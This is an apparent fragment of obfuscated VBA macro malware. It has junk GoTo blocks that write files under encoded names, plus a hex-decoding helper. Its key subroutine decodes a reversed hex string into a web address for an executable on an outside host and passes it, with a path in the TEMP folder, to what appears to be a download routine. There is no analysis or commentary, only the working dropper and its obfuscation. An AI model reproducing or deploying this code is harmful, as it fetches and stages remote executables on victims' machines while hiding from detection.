znyzccirnmmhvmxxtlhkxhuqhhbyerisfmoohsosfwysinhr:
Set WQTQGAKEBGH = Nothing
GoTo mfdblsyasdkumqldmlnmthdtailymcyopcjuamsvqulpgjff
Dim gmunzqdlbbcufuxuqkmipfftrovjuakxzkqjukmdtrbcvhto As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6763776663686B73656273766C77666E66637A717672696F77706B766873737561727678716A76646F77756A666B666D")) For Binary As #39664
Put #39664, , gmunzqdlbbcufuxuqkmipfftrovjuakxzkqjukmdtrbcvhto
Close #39664
mfdblsyasdkumqldmlnmthdtailymcyopcjuamsvqulpgjff:
GoTo rgpwvrrsavdkelprnmeyepbebspipuyssjanxnweexnawadl
Dim xrqsooqveeqdmfwxaszunwcqbxxwtnuwqwilnvvxmrsybwuj As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7A6A707777617A6176737A6270756E78676E76646A726F716C63766E696B6E6B69726F6E636865656963637A78657169")) For Binary As #54561
Put #54561, , xrqsooqveeqdmfwxaszunwcqbxxwtnuwqwilnvvxmrsybwuj
Close #54561
rgpwvrrsavdkelprnmeyepbebspipuyssjanxnweexnawadl:
GoTo unxmprovrhopbqarieqvsezbviwrzwjihqtonxwojkkqytan
Dim mbmsiykwartcofhlbuzdwzqjjubpbzhroeodklckndibkcth As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7061647172617467646B7270716F7A71656B6E68726A676E637565636B727A6670636A76796272657177777675757667")) For Binary As #21240
Put #21240, , mbmsiykwartcofhlbuzdwzqjjubpbzhroeodklckndibkcth
Close #21240
unxmprovrhopbqarieqvsezbviwrzwjihqtonxwojkkqytan:
End Function
Sub TFCVDJEJBJJ()
OJFXJUFZDBX StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6578652E312F736567616D692F72612E6D6F632E617372616C67756A2E7777772F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe"
End Sub
Public Function aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw(ByVal dfgbnbui8ygbo As String) As String
Dim jhgfdbdf34gv As Long
For jhgfdbdf34gv = 1 To Len(dfgbnbui8ygbo) Step 2
aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw = aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw & Chr$(Val("&H" & Mid$(dfgbnbui8ygbo, jhgfdbdf34gv, 2)))
Next jhgfdbdf34gv
End Function